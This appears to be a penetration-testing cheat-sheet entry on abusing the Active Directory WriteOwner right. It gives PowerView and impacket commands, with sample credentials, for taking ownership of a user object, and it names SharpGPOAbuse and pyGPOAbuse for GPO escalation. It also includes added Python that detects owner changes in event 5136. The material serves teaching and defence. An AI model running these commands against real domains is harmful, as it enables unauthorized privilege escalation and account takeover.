
WriteOwner

Ownership gives us the right to modify the object's permissions (its DACL). Once we are the owner we can grant ourselves FullControl, but we do not get it automatically.

Over a User

This permission allows us to change the owner of the user object, i.e. to grant ourselves the Owns permission, which can then be used to modify the object's security descriptor regardless of the permissions in the object's DACL.

Windows

# Create an object with the compromised account's credentials
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('marvel\x7331', $SecPassword)

# Set the ownership of the target object (PowerView)
Set-DomainObjectOwner -Credential $Cred -TargetIdentity "bob" -OwnerIdentity "x7331"

Linux

impacket-owneredit -action write -new-owner x7331 -target bob marvel.local/x7331:'Passw0rd123!'
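On the defensive side, an ownership change like the one above shows up in Windows Security event 5136 (Directory Service Changes auditing, which must be enabled in the SACL) as a "Value Deleted"/"Value Added" pair for the nTSecurityDescriptor attribute, whose values are SDDL strings starting with the owner (O:) component. The following detection logic is an added example, not part of the original page; the event records are constructed samples and the SIDs are placeholders.

```python
import re
from collections import defaultdict

# OperationType codes used by event 5136 (assumed from the event schema).
VALUE_ADDED = "%%14674"
VALUE_DELETED = "%%14675"

# Constructed sample records: a modified attribute is logged as two 5136
# events sharing one CorrelationID. Pair c1 changes bob's owner to the
# attacker SID; pair c2 only edits the DACL and keeps the owner.
EVENTS = [
    {"EventID": 5136, "CorrelationID": "{c1}", "OperationType": VALUE_DELETED,
     "SubjectUserName": "x7331", "ObjectDN": "CN=bob,CN=Users,DC=marvel,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor",
     "AttributeValue": "O:S-1-5-21-1-2-3-512G:S-1-5-21-1-2-3-513D:(A;;RPWP;;;S-1-5-21-1-2-3-1105)"},
    {"EventID": 5136, "CorrelationID": "{c1}", "OperationType": VALUE_ADDED,
     "SubjectUserName": "x7331", "ObjectDN": "CN=bob,CN=Users,DC=marvel,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor",
     "AttributeValue": "O:S-1-5-21-1-2-3-1105G:S-1-5-21-1-2-3-513D:(A;;RPWP;;;S-1-5-21-1-2-3-1105)"},
    {"EventID": 5136, "CorrelationID": "{c2}", "OperationType": VALUE_DELETED,
     "SubjectUserName": "admin", "ObjectDN": "CN=alice,CN=Users,DC=marvel,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor",
     "AttributeValue": "O:BAG:DUD:(A;;RP;;;AU)"},
    {"EventID": 5136, "CorrelationID": "{c2}", "OperationType": VALUE_ADDED,
     "SubjectUserName": "admin", "ObjectDN": "CN=alice,CN=Users,DC=marvel,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor",
     "AttributeValue": "O:BAG:DUD:(A;;RPWP;;;AU)"},
]

# The SDDL owner is a SID string or a two-letter well-known alias after "O:".
_OWNER_RE = re.compile(r"^O:(S-[\d-]+|[A-Z]{2})")

def sddl_owner(sddl):
    """Return the owner component of an SDDL string, or None if absent."""
    m = _OWNER_RE.match(sddl)
    return m.group(1) if m else None

def owner_changes(events):
    """Pair 5136 nTSecurityDescriptor events by CorrelationID and report
    every pair whose old and new SDDL owner differ."""
    pairs = defaultdict(dict)
    for ev in events:
        if ev["EventID"] == 5136 and ev["AttributeLDAPDisplayName"] == "nTSecurityDescriptor":
            pairs[ev["CorrelationID"]][ev["OperationType"]] = ev
    alerts = []
    for cid, ops in pairs.items():
        old, new = ops.get(VALUE_DELETED), ops.get(VALUE_ADDED)
        if old is None or new is None:
            continue  # incomplete pair, nothing to compare
        before, after = sddl_owner(old["AttributeValue"]), sddl_owner(new["AttributeValue"])
        if before != after:
            alerts.append({"correlation": cid, "subject": new["SubjectUserName"],
                           "object": new["ObjectDN"], "old_owner": before, "new_owner": after})
    return alerts
```

A hit where the subject account is also the new owner (as in pair c1) is the WriteOwner-to-Owns pattern described above and deserves a high-priority alert.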

Over a GPO

Note: the policy needs to be refreshed after the modifications: gpupdate /force.

For subsequent exploitation steps check WriteDACL.

Windows

From Windows, SharpGPOAbuse can be used to add a user to the Administrators group.

Linux

pyGPOAbuse abuses this right by creating an immediate scheduled task that runs as SYSTEM.
